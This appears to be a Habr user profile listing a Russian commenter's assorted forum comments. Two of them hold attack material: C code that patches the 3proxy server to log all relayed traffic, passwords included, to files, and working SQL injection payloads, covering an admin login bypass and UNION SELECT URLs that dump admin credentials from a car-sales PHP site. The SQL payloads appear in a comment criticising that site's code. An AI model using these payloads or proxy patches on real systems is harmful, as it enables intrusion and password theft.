Как стать автором
Обновить
0
0
лелик и болик @c411k

Пользователь

Отправить сообщение
спасибо, нах надо, ждем 2140.
Ой не надо только тут про всяких блек и вайтхетов… В вашем понимании «нормальный» это тот, кто делает через жопу. а «темный» — кто это видит, но говорить «нормальному» не собирается тчк

Да, несомненно ты молодец, «нормальный», рассказал всем и вся как другой «нормальный» допустил оплошность, благодаря которой «темные» будут творить зло, вместо варианта тихонько отослать мыло техподдержке, либо даже позвонить и промыть моск объяснить ситуацию.

И просто выносит мозг эта ненавязчивая приписка про количество минусов.
«Как из дешевого и простенького роутера сделать полнофункциональный сервер.»
это что мля? читал, читал, думал счас вот интересное пойдет. вода.
извращение. гланды через ж? =\
кое-что не твоего о панбб?

about.php
на оффсайте не искал, нашел в другом месте.

3proxy не предусматривает возможности логирования трафика, поэтому нам придется самим немного поправить исходники. Изменения нужно делать в файле sockmap.c, поскольку именно там происходит обмен данными. Начнем с исходящего от сервера трафика. Найди строку «j = recvfrom(param-> remsock, buf, BUFSIZE, 0,…». Эта функция посылает содержимое переменной buf на удаленный сервер. Чтобы контент этой переменной постоянно писался в файл, нужно вставить после этой строки такой код:

*(buf+j)=0;
// открываем файл /tmp/mylog_out для добавления инфы:
my_fp=fopen("/tmp/mylog_out","a");
// пишем в него содержимое переменной buf
fprintf(my_fp,"%s",buf);
// закрываем файл
fclose(my_fp);

Исходящий от клиента трафик, который может содержать важные пассы, записывается аналогичным способом. После строки «res=sendto(param-> remsock, buf + trans, i — trans, 0…» нужно всего-навсего добавить такой код:

*(buf + i)=0;
my_fp=fopen("/tmp/mylog_in","a");
fprintf(my_fp,"%s",buf+trans);
fclose(my_fp);


Теперь весь проходящий через сокс трафик будет писаться в файлы mylog_in и mylog_out.
русские хакеры через китайские прокси [x]
POST он не логирует, либо мое 2004/07/16 сильно устарело. жажду опровержения.
они хотели обмануть хеккера, СВОЛОЧИ!!!

мне кажется он вначале предложил им «выкупить» исходники, т.е. если они ему дают бабок, то он не выкладывает их на паблик. шантаж — не жантаж, но нефиг держать криворуких вебкодеров и сисадминов… у америкосов сыграло самолюбие, а гемб молодчик, видимо неплохо им на мозги покапал.
ниже «строки ввода URL» вообще-то находится панель закладок ;) два плагина слева от «строки ввода URL» — cookie editor и live http headers.
автору стоит серьезно задуматься о «безопасном» коде. потому что в данных сорцах «безопасность» на нуле. смотрел bmw.rar, но не сомневаюсь, что и в остальных тоже самое.

ни одной проверки на то, что кушает скрипт.
admin/index.php

if (isset($_POST['adminname'])) $_SESSION['user'] = $_POST['adminname'];
if (isset($_POST['adminpass'])) $_SESSION['pass'] = $_POST['adminpass'];
...
$res = mysql_query("SELECT name, pass FROM admin WHERE (name='".$_SESSION['user']."' AND pass='".$_SESSION['pass']."')");


login: admin') or 1=1/*
pass: blablalbalblb

и мы в админке.

/admin/uploader/script.php доступен даже без авторизации! причем есть возможность залить любой файл (например, вебшелл).

ну и остальное аналогично-печально.

http://localhost/index.php?op=view_car&car_id=333'+union+select+1,concat_ws(0x3a,name,pass),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9+from+admin/*
http://localhost/index.php?op=view_marka&marka=Volkswagen'+and+1=1/*
http://localhost/admin/index.php?op=view_car&car_id=3'+and+1=-1+union+select+1,version(),concat_ws(0x3a,name,pass),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9+from+admin/*

и т. д…



да и админский пасс в бд хранить в плейн-тексте — это не есть гуд…
нер, ты в асе молчишь, поэтому тут напишу. EXTR_SKIP не забыл? дыра или убейте меня кто-нибудь..? ;)
в военкоматах до сих пор СССР — все на бумаге… очень надеюсь что меня кто-нибудь переубедит, ибо сию новость я слышал минимум от 2ух человек.
гугл решает ;)
ну раз про хабр на хабре, то зачем употреблять "%username%"?
ужасно… флэш. =\
кто-то где-то написал, что это из-за детского порно в сети.

именно http://dolboeb.livejournal.com/1355614.html?thread=59367262#t59367262
ы, оказывается последних «биииииииип-ов» на хабре много =)
1

Информация

В рейтинге
Не участвует
Откуда
Россия
Дата рождения
Зарегистрирован